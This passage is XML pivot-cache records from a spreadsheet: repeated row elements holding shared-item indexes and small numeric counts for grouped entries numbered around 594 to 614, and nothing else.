  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="4"/>
    <x v="594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="594"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="594"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="594"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="594"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="594"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="5"/>
    <x v="594"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="594"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="594"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="6"/>
    <x v="595"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="5"/>
    <x v="595"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="3"/>
    <x v="595"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="595"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="4"/>
    <x v="596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="596"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="596"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="596"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="596"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="596"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="596"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="597"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="597"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="597"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="597"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="597"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="597"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="597"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="3"/>
    <x v="597"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="597"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="597"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="4"/>
    <x v="597"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="597"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="20"/>
    <x v="597"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="597"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="598"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="10"/>
    <x v="598"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="598"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="599"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="599"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="1"/>
    <x v="599"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="599"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="599"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="599"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="599"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="27"/>
    <x v="599"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="599"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="15"/>
    <x v="598"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="2"/>
    <x v="600"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="600"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="600"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="600"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="24"/>
    <x v="600"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="600"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="601"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="13"/>
    <x v="601"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="601"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="601"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="601"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="601"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="601"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="601"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="2"/>
    <x v="601"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="601"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="1"/>
    <x v="601"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="602"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="602"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="602"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="602"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="602"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="602"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="602"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="602"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="602"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="602"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="602"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="602"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="602"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="602"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="4"/>
    <x v="603"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="603"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="8"/>
    <x v="603"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="12"/>
    <x v="603"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="30"/>
    <x v="603"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="603"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="604"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="605"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="5"/>
    <x v="605"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="605"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="605"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="605"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="605"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="5"/>
    <x v="604"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="604"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="52"/>
    <x v="604"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="41"/>
    <x v="604"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="606"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="606"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="606"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="606"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="606"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="606"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="606"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="606"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="606"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="606"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="6"/>
    <x v="606"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="2"/>
    <x v="606"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="606"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="2"/>
    <x v="606"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="607"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="607"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="607"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="607"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="607"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="608"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="608"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="608"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="608"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="6"/>
    <x v="608"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="608"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="4"/>
    <x v="608"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="4"/>
    <x v="608"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="7"/>
    <x v="608"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="3"/>
    <x v="608"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="5"/>
    <x v="608"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="3"/>
    <x v="608"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="608"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="608"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="1"/>
    <x v="609"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="1"/>
    <x v="609"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="3"/>
    <x v="609"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="5"/>
    <x v="609"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="609"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="609"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="610"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="610"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="3"/>
    <x v="610"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="6"/>
    <x v="610"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="610"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="3"/>
    <x v="611"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="611"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="611"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="20"/>
    <x v="611"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="26"/>
    <x v="611"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="26"/>
    <x v="611"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="611"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="612"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="612"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="612"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="612"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="612"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="612"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="612"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="1"/>
    <x v="612"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="612"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="612"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="10"/>
    <x v="612"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="15"/>
    <x v="612"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="25"/>
    <x v="612"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="1"/>
    <x v="612"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="3"/>
    <x v="613"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="2"/>
    <x v="613"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="2"/>
    <x v="10"/>
    <n v="7"/>
    <x v="613"/>
  </r>
  <r>
    <x v="3"/>
    <x v="11"/>
    <n v="8"/>
    <x v="613"/>
  </r>
  <r>
    <x v="4"/>
    <x v="12"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="5"/>
    <x v="13"/>
    <n v="0"/>
    <x v="613"/>
  </r>
  <r>
    <x v="0"/>
    <x v="0"/>
    <n v="0"/>
    <x v="614"/>
  </r>
  <r>
    <x v="1"/>
    <x v="1"/>
    <n v="0"/>
    <x v="614"/>
  </r>
  <r>
    <x v="0"/>
    <x v="2"/>
    <n v="0"/>
    <x v="614"/>
  </r>
  <r>
    <x v="1"/>
    <x v="3"/>
    <n v="0"/>
    <x v="614"/>
  </r>
  <r>
    <x v="0"/>
    <x v="4"/>
    <n v="1"/>
    <x v="614"/>
  </r>
  <r>
    <x v="1"/>
    <x v="5"/>
    <n v="1"/>
    <x v="614"/>
  </r>
  <r>
    <x v="0"/>
    <x v="6"/>
    <n v="2"/>
    <x v="614"/>
  </r>
  <r>
    <x v="1"/>
    <x v="7"/>
    <n v="2"/>
    <x v="614"/>
  </r>
  <r>
    <x v="2"/>
    <x v="8"/>
    <n v="0"/>
    <x v="614"/>
  </r>
  <r>
    <x v="3"/>
    <x v="9"/>
    <n v="0"/>
    <x v="614"/>
  </r>
